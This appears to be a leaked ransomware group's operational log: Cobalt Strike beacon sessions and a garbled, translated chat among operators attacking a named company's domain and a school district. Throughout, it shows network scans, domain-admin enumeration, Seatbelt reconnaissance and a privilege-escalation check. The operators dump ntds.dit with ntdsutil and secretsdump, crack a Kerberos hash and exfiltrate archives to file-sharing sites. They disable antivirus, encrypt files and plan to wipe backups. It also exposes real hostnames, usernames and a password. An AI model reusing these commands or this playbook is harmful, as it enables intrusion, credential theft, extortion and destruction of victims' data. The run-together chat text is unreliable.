                         1AE0F8D2724492417699C3BD444312212A5FF50A246D4D5770AD50860E3B52CCD2BCE7A6660DA9B6
                         FFE81B456129A617FBF351F815FE23624699E69EFB4F4788531E5677B125136BCF1AD9DCC3C8C139
                         B36C05C5A493BE7237E14D4F194307F1B7D53F2CA333364CAC135D79688E4A0EBB342BC3DA9C3D12
                         7255740A8843B17CAB787077BDDFEF59A916E56392DB087BE09523933671E3832D532D329B2BFCF4
                         ECDB2A51274DD50970EC9796AB56788FA7CE668093FC5D68EE6AB796574985BD1CFDAF6EE88416E9
                         5F33A3F7C29E4ED1C8804DEA928E2050A2070044A83AF610D673EAF783D3C258BF4F00F3A67EE236
                         4A19579A448CEA1806C716B3603C0C6DA9B72BFAB8390CD7971CD4FBE8F022E64828069C478D56CA
                         DE866536D19FFB5EF529F408CBC7D9F6B161164632CEE450220CA94B1CD692D9A6C4EACA431AAAD9
                         024F429182D8D0B4BAFE8C9B27BE54444DBFB4D7FE2F3949064F9CBC3034F59EF0AD9C01D0238F53
                         6614F21303664809AECFE53914D4E16B9222BD0550F8587F39AFA385E87EA7B430994234E883FB46
                         150E6BFF285F69F035C0410C11E4610C187EA4A05E57E3FEE8C1CB133DAE9549E9B9E757E0BB9A1E
                         5016A8893C2EDECD58D61216879A358AFAE0799986B31CA903B655E244C19ADBF68DB8A8417F5989
                         976B4B19CA800E5BF1E8B7227A559E146A7B63360E430B31823801CAA81E625481858F598BB10FF9
                         E31F97473E408B67297A919C3C4264ABA52F8242F4F8E07D4946AE7B146A69950C54923A895D333E
                         027820953AC4FBED2201253B15B79AC993628CADDA92AA14232A6F0974A19983099890F2119E7D64
                         C5AA329A5CE288E7CB3F66AB76619330E27380E145E089DD71799B7B511FBF9A843F8DF6973EBBAC
                         5779C06426790A5C7998E94E44341A18CE6D5C4287C93C82286DF1AF180DF16543567A3E9D8A8679
                         E5B16BCCD1136074AFD36F9FBA1D8913C50C00718F9B48730670713A50D4590B4FBB8932483A2AE6
                         B80BA376DAECB3B8C0C896E6F402E95E6EAE1B5D1B125559904D8B9B295E1F9DEE020493AA73E62C
                         22953B86DDC1F71447449C9924192EFA419025D07EA8D8C876FBFC0E697BED24440CEBE3D943AF8B
                         F3A5419F139B893CE4A8B4E81EB63BA13DB0B1FB22020BACD3B77E4165E0B0AC2F1109606F976F3F
                         C5A62E1704F09522C1683D69278B4E4978E1717EEC5E10F72A17A00B77BE6A2493B3F889AB8EFAF6
                         B0F5D73B0999D72F5FACBEED69AF9CCF0F4953104987E7A6ABB8004A640F8


````beacon> portscan 10.59.8.0/24 23,22,80,1433,135,445,3389,5900`
```
10.59.8.233:80
10.59.8.223:80
10.59.8.221:80
10.59.8.217:80
10.59.8.213:80
10.59.8.210:80
10.59.8.201:80
10.59.8.204:80
10.59.8.99:80
10.59.8.193:80
10.59.8.188:80
10.59.8.180:80
10.59.8.175:80
10.59.8.167:80
10.59.8.165:80
10.59.8.164:80
10.59.8.160:80
10.59.8.117:80
10.59.8.133:80
10.59.8.132:80
10.59.8.122:80
10.59.8.120:80
10.59.8.103:80
10.59.8.243:80
10.59.8.232:80
10.59.8.147:80
10.59.8.106:80
10.59.8.55:80
10.59.8.112:80
10.59.8.107:80
10.59.8.104:80
10.59.8.98:80
10.59.8.102:80
10.59.8.97:80
10.59.8.88:80
10.59.8.86:80
10.59.8.85:80
10.59.8.84:80
10.59.8.81:80
10.59.8.67:80
10.59.8.61:80
10.59.8.53:80
10.59.8.49:80
10.59.8.41:80
10.59.8.48:80
10.59.8.40:80
10.59.8.34:80
10.59.8.5:80
10.59.8.28:80
10.59.8.19:80
10.59.8.12:80
10.59.8.9:80
```
``Scanner module is complete````
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits
The command completed successfully.

``10.59.9.180 ping more``beacon> portscan 192.168.237.0/24 23,22,80,1433,135,445,3389,5900
```
192.168.237.248:3389
192.168.237.248:1433
192.168.237.248:135
192.168.237.248:80
192.168.237.239:5900
192.168.237.231:80
192.168.237.231:23
192.168.237.216:3389
192.168.237.203:80
192.168.237.196:80
192.168.237.196:23
192.168.237.187:3389
192.168.237.187:135
192.168.237.187:80
192.168.237.248:22 (SSH-2.0-WeOnlyDo-wodFTPD 3.3.0.424)
192.168.237.231:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
192.168.237.216:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3)
192.168.237.203:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13)
192.168.237.196:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.6)
192.168.237.179:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
192.168.237.203:23
192.168.237.239:22 (SSH-2.0-OpenSSH_7.6)
192.168.237.187:22 (SSH-2.0-6.4.18.407 SSH Tectia Server)
192.168.237.179:445 (platform: 500 version: 6.1 name: ZLABS-VR-1 domain: WORKGROUP)
192.168.237.187:445
192.168.237.239:445
192.168.237.248:445
```
``Scanner module is complete````
 [*] OS Build Number: 18363
 [*] Enumerating installed KBs...

 4576484
 4517245
 4560959
 4561600
 4565554
 4569073
 4576751
 4576754
 4574727

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [*] Finished. Found 2 potential vulnerabilities.

``portscan 172.24.148.0/24-OS undefined?
```
172.21.182.237:5985
172.21.182.237:636
172.21.182.237:593
172.21.182.237:464
172.21.182.237:389
172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
172.21.182.237:5985
172.21.182.237:636
172.21.182.237:593
172.21.182.237:464
172.21.182.237:389
172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
172.21.182.237:139
172.21.182.237:135
172.21.182.237:88
172.21.182.237:53
172.21.182.227:5985
172.21.182.227:3389
172.21.182.227:636
172.21.182.227:593
172.21.182.227:464
172.21.182.227:389
172.21.182.227:139
172.21.182.227:135
172.21.182.227:88
172.21.182.227:80
172.21.182.227:53
172.21.182.108:3389
172.21.182.108:139
172.21.182.108:135
172.21.182.108:23
172.21.182.109:3389
172.21.182.109:139
172.21.182.109:135
172.21.182.63:5900
172.21.182.63:3389
172.21.182.63:139
172.21.182.63:135
172.21.182.60:3389
172.21.182.45:5985
172.21.182.45:3389
172.21.182.45:389
172.21.182.45:139
172.21.182.45:135
172.21.182.45:88
172.21.182.45:53
172.21.182.45:636
172.21.182.45:22 (SSH-2.0-OpenSSH_for_Windows_8.1)
172.21.182.8:600
172.21.182.8:443
172.21.182.8:135
172.21.182.8:80
172.21.182.8:22 (SSH-2.0-OpenSSH_4.3)
172.21.182.32:23
172.21.182.32:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3)
172.21.182.27:5900
172.21.182.27:88
172.21.182.27:22 (SSH-2.0-OpenSSH_7.9)
172.21.182.27:445
172.21.182.8:445
172.21.182.63:445
172.21.182.108:445
172.21.182.227:445
172.21.182.237:445
```
``Scanner module is complete`` took one by one not in parallel all 5 in /24 then in portscan /24 these sabnets and wrote without it without complete domain?
Pinging PMP-2K8R2-DC1.csez.zohocorpin.com [172.21.182.45] with 32 bytes of data:
Reply from 172.21.182.45: bytes=32 time=13ms TTL=126
Reply from 172.21.182.45: bytes=32 time=12ms TTL=126
Reply from 172.21.182.45: bytes=32 time=11ms TTL=126
Reply from 172.21.182.45: bytes=32 time=7ms TTL=126

Ping statistics for 172.21.182.45:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 13ms, Average = 10ms

```
```
Pinging pmp-w7-jap.csez.zohocorpin.com [172.24.148.190] with 32 bytes of data:
Reply from 172.24.148.190: bytes=32 time=26ms TTL=126
Reply from 172.24.148.190: bytes=32 time=9ms TTL=126
Reply from 172.24.148.190: bytes=32 time=8ms TTL=126
Reply from 172.24.148.190: bytes=32 time=7ms TTL=126

Ping statistics for 172.24.148.190:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 26ms, Average = 12ms

```
```
Pinging pmp-win10-64-2.csez.zohocorpin.com [192.168.237.248] with 32 bytes of data:
Reply from 192.168.237.248: bytes=32 time=12ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126

Ping statistics for 192.168.237.248:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 12ms, Average = 9ms

```
```
Pinging pmp2k16.csez.zohocorpin.com [172.24.147.218] with 32 bytes of data:
Reply from 172.24.147.218: bytes=32 time=23ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126

Ping statistics for 172.24.147.218:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 9ms, Maximum = 23ms, Average = 12ms

```
```
Pinging ramanathan-0501.csez.zohocorpin.com [10.59.8.42] with 32 bytes of data:
Reply from 10.59.8.42: bytes=32 time=48ms TTL=63
Reply from 10.59.8.42: bytes=32 time=72ms TTL=63
Reply from 10.59.8.42: bytes=32 time=56ms TTL=63
Reply from 10.59.8.42: bytes=32 time=63ms TTL=63

Ping statistics for 10.59.8.42:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 48ms, Maximum = 72ms, Average = 59ms

``````
[+] host called home, sent: 409 bytes
[+] received output:
Server: UnKnown
Address: 192.168.100.30

_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = tsi-csez-adc.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = ruestadc.ru.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = win2k12master.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = est-adc.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = est-adc2.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-master-server.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave4.csez.zohocorpin.com
csez.zohocorpin.com nameserver = proxy-server2.csez.zohocorpin.com
csez.zohocorpin.com nameserver = proxy-server1.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave3.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave1.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave2.csez.zohocorpin.com
'nltest' is not recognized as an internal or external command,
operable program or batch file.

``Ping them too``.
  pmp-2k8r2-dc1 pmp\administrator
  pmp-w7-jap pmp\administrator
  pmp-win10-64-2 pmp\administrator
  pmp2k16 administrator
  ramanathan-0501 ZOHOCORP\ramanathan-0501
``````
====== RDPSavedConnections ======

Saved RDP Connection Information (S-1-5-21-1867688552-3649366528-3325780993-65238)

  RemoteHost UsernameHint
  ---------- ------------
  pmp-2k8r2-dc1 pmp\administrator
  pmp-w7-jap pmp\administrator
  pmp-win10-64-2 pmp\administrator
  pmp2k16 administrator
  ramanathan-0501 ZOHOCORP\ramanathan-0501

====== RDPSessions ======

  SessionID : 0
  SessionName : Services
  UserName :
  DomainName :
  State : Disconnected
  SourceIp :

  SessionID : 1
  SessionName : Console
  UserName : raja-9298
  DomainName : ZOHOCORP
  State : Active
  SourceIp :
```
```
====== LogonSessions ======

Logon Sessions (via WMI)


  UserName : raja-9298
  Domain : ZOHOCORP
  LogonId : 34354149
  LogonType : Interactive
  AuthenticationPackage : Kerberos
  StartTime : 13-09-2020 10:40:04
  UserPrincipalName :

  UserName : raja-9298
  Domain : ZOHOCORP
  LogonId : 34354119
  LogonType : Interactive
  AuthenticationPackage : Kerberos
  StartTime : 13-09-2020 10:40:04
  UserPrincipalName :
====== LSASettings ======

  auditbasedirectories : 0
  auditbaseobjects : 0
  Bounds : 00-30-00-00-00-20-00-00
  crashonauditfail : 0
  fullprivilegeauditing : 00
  LimitBlankPasswordUse : 1
  NoLmHash : 1
  Security Packages : ""
  Notification Packages : scecli
  Authentication Packages : msv1_0
  disabledomaincreds : 0
  everyoneincludesanonymous : 0
  forceguest : 0
  LsaCfgFlagsDefault : 0
  LsaPid : 908
  ProductType : 6
  restrictanonymous : 1
  restrictanonymoussam : 1
  scenoapplylegacyauditpolicy : 1
  SecureBoot : 1
  usemachineid : 0
```
```
====== LocalUsers ======

  ComputerName : localhost
  UserName : Administrator
  Enabled : False
  Rid : 500
  UserType : Administrator
  Comment : Built-in account for administering the computer/domain
  PwdLastSet : 01-01-1970 00:00:00
  LastLogon : 28-05-2019 23:10:40
  NumLogins : 5

  ComputerName : localhost
  UserName : DefaultAccount
  Enabled : False
  Rid : 503
  UserType : Guest
  Comment : A user account managed by the system.
  PwdLastSet : 01-01-1970 00:00:00
  LastLogon : 01-01-1970 00:00:00
  NumLogins : 0

  ComputerName : localhost
  UserName : Guest
  Enabled : False
  Rid : 501
  UserType : Guest
  Comment : Built-in account for guest access to the computer/domain
  PwdLastSet : 01-01-1970 00:00:00
  LastLogon : 01-01-1970 00:00:00
  NumLogins : 0

  ComputerName : localhost
  UserName : sysadmin
  Enabled : True
  Rid : 1001
  UserType : Administrator
  Comment :
  PwdLastSet : 19-06-2019 14:28:18
  LastLogon : 15-08-2019 08:31:17
  NumLogins : 31

  ComputerName : localhost
  UserName : WDAGUtilityAccount
  Enabled : False
  Rid : 504
  UserType : Guest
  Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
  PwdLastSet : 28-05-2019 22:52:09
  LastLogon : 01-01-1970 00:00:00
  NumLogins : 0.
``ping CSEZ.ZOHOCORPIN.COM.
beacon> execute-assembly /home/user/tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \CSEZ.ZOHOCORPIN.COM\sysvol\CSEZ.ZOHOCORPIN.COM\policies\

[+] received output:
[-] Invoke_3 on EntryPoint failed.

``````
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
beacon> shell net group "enterprise admins" /dom
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 162 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

System error 5 has occurred.

Access is denied.


[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

System error 5 has occurred.

Access is denied.

``Access is dead tried the "domain admins" net group /dom maybe also the VPN is not connected/``
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x52 (82) - Local Error
Terminating program.
``````
====== AntiVirus ======
Windows Defender
Kaspersky Endpoint Security for Windows
```
```
====== DotNet ======
  Installed CLR Versions
      4.0.30319
  Installed .NET Versions
      4.8.03752
  Anti-Malware Scan Interface (AMSI)
      OS supports AMSI : True
     .NET version supports AMSI : True
        [!] The highest .NET version is enrolled in AMSI!
```
```
====== NetworkShares ======

  Name : ADMIN$
  Path : C:\WINDOWS
  Description : Remote Admin

  Name : C$
  Path : C:\
  Description : Default share

  Name : D$
  Path : D:\
  Description : Default share

  Name : E$
  Path : E:\
  Description : Default share

  Name : IPC$
  Path :
  Description : Remote IPC

```
```
====== OSInfo ======

  Hostname : raja-9298
  Domain Name : csez.zohocorpin.com
  Username : ZOHOCORP\raja-9298
  ProductName : Windows 10 Pro
  EditionID : Professional
  ReleaseId : 1909
  Build : 18363.1082
  BuildBranch : 19h1_release
  CurrentMajorVersionNumber : 10
  CurrentVersion : 6.3
  Architecture : AMD64
  ProcessorCount : 12
  IsVirtualMachine : False
  BootTimeUtc (approx) : 12-09-2020 18:15:41 (Total uptime : 08:15:23:11)
  HighIntegrity : False
  IsLocalAdmin : True
    [*] In medium integrity but user is a local administrator - UAC can be bypassed.
  CurrentTimeUtc : 21-09-2020 09:38:52 (Local time: 21-09-2020 15:08:52)
  TimeZone : India Standard Time
  TimeZoneOffset : 05:30:00
  InputLanguage : English (India)
  InstalledInputLanguages : English (India), Unknown layout
  MachineGuid : e2c815c9-b79d-4a27-bc08-6c917f3ab98d
```
```
====== InstalledProducts ======
Adobe Flash Player 10 Plugin
10.2.153.1

Adobe Shockwave Player 12.1
12.1.3.153

CVSNT
2.0.51

WinCvs 2.0

Google Chrome
85.0.4183.102

Microsoft Edge
85.0.564.51

Microsoft Edge Update
1.3.135.29

TeamViewer
15.3.8497

TotalCSVConverter

Intel(R) Wireless Bluetooth(R)
20.60.1

DcuMSMWrap
5.0.03

Microsoft Visual C++ 2013 Redistributable (x64)
12.0.30501.0

Realtek USB Audio
6.3.9600.2202

Python 3.7.3 Tcl/Tk Support (32-bit)
3.7.3150.0

DFUDriverSetupX64Setup
6.6.1939.0

Python 3.7.3 Documentation (32-bit)
3.7.3150.0

Thunderbolt™ Software
17.4.79.510

Python 3.7.3 Core Interpreter (32-bit)
3.7.3150.0

Skype for Business Web App Plug-in
15.8.20020.400

Microsoft VC++ redistributables repacked.
12.0.0.0

Java Auto Updater
2.8.71.15

MySQL Installer - Community
1.4.29.0

Python 3.7.3 Development Libraries (32-bit)
3.7.3150.0

Intel(R) Chipset Device Software
10.1.17541.8066

ManageEngine Analytics Plus
1.0

Google Update Helper
1.3.35.451

swMSM
12.0.0.1

ManageEngine
10.0.518.W

ZVoice - Desktop 1.1.9

Mozilla Firefox 79.0 (x64 en-US)

PuTTY release 0.74 (64-bit)

Mercurial 3.8.1 (x64)

FortiClient VPN
6.2.0.0780

LibreOffice 6.2.4.2
6.2.4.2

MySQL Server 5.7
5.7.26
``SeatBelt all``.

beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
sysadmin
ZOHOCORP\raja-9298
The command completed successfully.

``````
beacon> shell nslookup
[*] Tasked beacon to run: nslookup
[+] host called home, sent: 39 bytes
[+] received output:
Default Server: UnKnown
Address: 192.168.100.30


```
Domain : csez.zohocorpin.com ``You got the session? user4til tomorrow.1.done.gaudyme.comTill tomorrow by 7.00, the rest of the sessions are in the slipstream then```.
servers:
in hell: 2
actual: 1
alive: 1
pulled: 5

armas:
by hell: 30
alive: 5
drawn: 5

encrypted: everything
``and that's it, then the status for the tick and in the other folders then we'll leave it to the dk2 sessions left to be pinged``
beacon> shell ping 172.16.1.247 -n 1
[*] Tasked beacon to run: ping 172.16.1.247 -n 1
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 172.16.1.247 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.247:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

beacon> shell ping 172.16.1.83 -n 1
[*] Tasked beacon to run: ping 172.16.1.83 -n 1
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 172.16.1.83 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.83:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

beacon> shell ping 172.16.1.61 -n 1
[*] Tasked beacon to run: ping 172.16.1.61 -n 1
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 172.16.1.61 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.61:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Finance, accounting, corporate files are encrypted Disconnect the other avs and that's all it worked Check the folders)) have deleted How did you disconnect then? on the dk yes
but there's no control console.
it looks like it's in the cloud) shut down the avs? spread on the dk readme.txt finished with the servers sorting serversoksort servers and so on the old scheme all the same hash krbrst userno just in case throw here hash not the fact that there all passwords So if there are passwords, what's the point of hashes?in cleartext as it is clear cleartext passwords)there all hashes.ptsdlt.ptsdlt not ready work)ready work in forms? type echo 1 > 1.htmlcreate there a file 1.htm with the text 1happens to the truth there is no iisstart.htmsearch there index fileadaThis path on the disk you mean? i mean in intpub is wwwroot?there is a wwwroot there will be a folder inetpub or something like that check the C:\direct in forms or ftp in C:\Windows\system32\inetsrv\Config` no configs what about configs and so on let's deal with forms.decoder ntsy you run the extract
secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local
Put all files in one folder, there will be 4 of them together with the script.
pip
pip install impacket
pip install pycrypto
pip install pyasn1
apt-get install python-dev
``no config on the ftp in ``C:\Windows\system32\inetsrv\Confighow much archive did you get? it's too bighow to upload here `sendspace.com` click here and password me first into the archive under the password and upload here it is downloaded. and where do you want to upload it?where is the physical path on the disk look at the configs and on both winndef, as i understand on the fpt simantecki other check the processesedrforms.sisd.net pulled in the same way as the external one. check these 3
mail.sisd.net 40.101.49.66 Sign in to Outlook
autodiscover.sisd.net 52.97.133.216 Sign in to Outlook
forms.sisd.net 216.171.94.67 Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server
``mail.sisd.net only external ftp yes, I get it. we will put them zakrepy? and communication with the internal server as you can see they have ftp. subdomains that have external ipey sent you a scan of subdomains from their external main domain> what to scan? or again I do not understand? sub domains[ ](https://mediaeveryone.com/group/sisd-net?msg=z9QaJhhCjDGhxPEBL) then do not understand, what does scan sub domains?the dlls are not knocked out now let's play with this and do another option zakrepaetsya and we are interested nunu external What does it mean white ips?) check edtax on these dns with the main yes[ ](https://mediaeveryone.com/group/sisd-net?msg=SJRstQrsdQgGv5wNi) subs only these? yes. is there a session available for manipulation?[ ](https://mediaeveryone.com/group/sisd-net?msg=3uPeboh7iKzkkJTER) local 10.0.51.253sub>> scan the subs
www.sisd.net 13.35.193.39 Windows Microsoft-IIS 8.5 ASP.NET 4.0.30319 Socorro Independent School District / Homepage
mail.sisd.net 40.101.49.66 Sign in to Outlook
autodiscover.sisd.net 52.97.133.216 Sign in to Outlook
sip.sisd.net 52.112.193.13 RTC 7.0
my.sisd.net 216.171.94.39 Apache PHP my.sisd.net Log-in
portal.sisd.net 216.171.94.44
forms.sisd.net 216.171.94.67 Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server
survey.sisd.net 216.171.94.93
archive.sisd.net 216.171.94.95
www2.sisd.net 216.171.94.96 Windows Microsoft-IIS 10.0 IIS Windows Server
ftp.sisd.net 216.171.94.101 Windows Microsoft-IIS 8.5 ASP.NET IIS Windows Server
support.sisd.net 216.171.94.102 Apache Socorro Independent School District
connect.sisd.net 216.171.94.133 Apache Connect SISD
``I'll take the hashes and put them into a confu-file, upload it to a file-sharing site and send me the local ip or the external one will be lit pinging from inside the domain
ftp.sisd.net
´´you have yes, trying to download ptdr.net´´ see hp5 min can already be installed, take the ntds and while under this account and look for 2 quiet godforsaken servers without avs and other stuff.´´you have it yes? account from kerba you already account yes? ok. wait for the speed, unlike cobalt, there is no speed limit, better via armitage about 8-10 hours
just a long time will be pumping Listen, and koba 637 meters download? and that's how long it all, maybe it does not download, and I'm waiting...okshnyal, downloaded, made myself a token yes and jumped away to the silent servers I will issue a fast do nashuyuchit muchesnimi just in case it looks like yes you probably stopped the service during execution now can pick up filesvot it seems true ` ` `.
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: cr fu c:\windows\temp\ntds
Creating snapshot...
Snapshot set {feb986c1-384e-4798-8a98-320359ac7bf8} generated successfully.
Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} mounted as C:\$SNAP_202012020302_VOLUMEC$\
Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202012020302_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\windows\temp\ntds\Active Directory\ntds.dit

                  Defragmentation Status (% complete)

          0 10 20 30 40 50 60 70 80 90 100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\windows\temp\ntds\registry\SYSTEM
Copying c:{windows\temp\ntds\registry\SECURITY
 error 0x800706ba(The RPC server is unavailable.)
 error 0x800706ba(The RPC server is unavailable.)
 error 0x800706ba(The RPC server is unavailable.)
IFM media created successfully in c:{windows\temp\ntds
ifm: q
ntdsutil: q

It will directly say 100 it will write when it makes a full backup, wait, it says something else...ndsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q give the bicon output after it works two folders and one with two files was output after ntdsutil was worked out?vss service stopped I want to compress ndts.dit `c:\windows\temp\ntds\Active Directory\ntds.dit : The process cannot access the file because it is being used by another process.
`oki I'll throw in two pins and wait for ntdsda I noticed) that's what long interruptions do) well there's one in the forum
sc query vss
sc start vss
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
sc stop vss
If not then in both places do you make notes right now on the forum and in your personal notes no info?) remind me how, because we only tried once, I think, and that did not work) take it off via ptdstuidler no ``
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] No EDR products found! Operate at your own risk!
``I'm on dk pod token c$ balloon vindo on dk? yes, to the server jumped valid? dcsync for some reason for 20 sec hesitates and does not return anything. What would that mean?
$krb5tgs$23$*sccmadmin$admin.sisd.k12$MSSQLSvc/SCCM-SQL.admin.sisd.k12 juliet25-
``So, let me give you access to 2 domains at once one. @user7 there are 2 more people on the way to where the second?)and where is the other half?)helloHiHiHiVi never keep more than 10-15 active sessionsokwhen you need to do related work in 4.1client do not deleteadam 4.2 go to finally? +okay, then all have 4.2 cleaneno 4.2 I also haveona 4.1 in my kobe yesterday closed gofer?:heavy_plus_sign:+ everybody have coba 4.2?:heavy_plus_sign:+++tasks are clear to all? hello there:space_invader:add me to my colleagues in the confabs let's write from one dude to another about pass from nimbla[ ](https://mediaeveryone.com/channel/general?msg=a7bE4sNqbM6uRkvJG) flows against the current[ ](https://mediaeveryone.com/channel/general?msg=3YDeQbYx3iq2NzQik) what? in water is unusual scheme we close two networks at once?
there's a couple of people in the water who are neurotic, they go to these nimbles, but they don't save their passwords anywhere.
once again on the computers/servers went through\to the browsers files with passwords and what were you doing? how are you getting on? google help)[ ](https://mediaeveryone.com/channel/general?msg=QPvucTEsDKGjawem2) is this something that already exists, or do you have to do? which can overwrite a network drive a few times console fileshredder[ ](https://mediaeveryone.com/channel/general?msg=xNu8E3Moc2RP4oAJv) and more? to overwrite backups if it doesn't encrypt[ ](https://mediaeveryone.com/channel/general?msg=YW4zCCrXYpf7Q7Hvu) go to ssh and rm -rf-prepare more filehreddertoday I'll try over the garbage if lin will allow. it's pretty neutered there or check their disks all?we've been mashing them and mashing them and mashing them and mashing them and mashing them and mashing them and mashing them. we still haven't updated to 10[ ](https://mediaeveryone.com/channel/general?msg=Y9hzbFuc43vehpwWG) to all esx? We have to look at the confab first, clarify what kind of linux systems are there? there is a skul, there is mail (one), there are listings and files, there is access to esx all or not all at #rtpcompany-com tell me exactly without like in #rtpcompany-com *almost* everything is ready
in #waterway-com the skool is rolled out, there's a problem with the mail, there's a problem with backupsBackups on the mega have not goneBackups are trying to take off
no 445 anywhere, only backups are visible on the nasa for nowHow is the work progressing?hi all hello thereafter, we are trying to remove the backups from the mega in the water, let it pour in the mega in the water, and do not confuse which one or what and the mega we leave in the water in the slipIt turns out that piripezd sometimes in the mouth cleaner even missthink only water then okada it missklik in the water now .you misinform me in rt all yes only water and rt and water while loading? no in rt all unloaded? would not want to leave the mega there it's all very interesting, but can we wrap it up already today?
I'm sleepy.
Everything's ready for the rtp.
i've got everything on the water except for the backups, i'll have until 3 tomorrow just to deal with itTiny whisper BDSM it's the windup's job to sufferSo let it stay like that)Good for you too generous rating "Fragile "It's not fragile, it's just fucked up. It's better for everything but dota and pbna.
Fuck the windup.
```
of course fuck it, you can see how fragile it is) maybe. i don't even know why it's allowed for rdp
maybe it's because it's a "remote" service if you could do that there'd be a lot of conflicts Fuck the windup... but it's the windup... i know it's stupid...
it's vindaKuryu i understand that you're googling now, well when you finish googling please tell me what you found in the repository of knowledge it's a fixed protocol, not a service that you can deploy anywhere else all the rest is forward on nix - you could on vinda) seriously?)
you will ALWAYS have reception on the smb on 2 ports
read the documentation)
```
Googling))) not changing the port is portfwd It is possible to configure port mapping on the nasa
Everything can be changed
```
read the documentation)) is a medal the last two messages - on bash.org unequivocally and no matter what it will not work everything can be changed I'm not even fucking sure that it changes in the wind in general) ok not change the port in AD
and then guess
which one is smb
which is the rdp
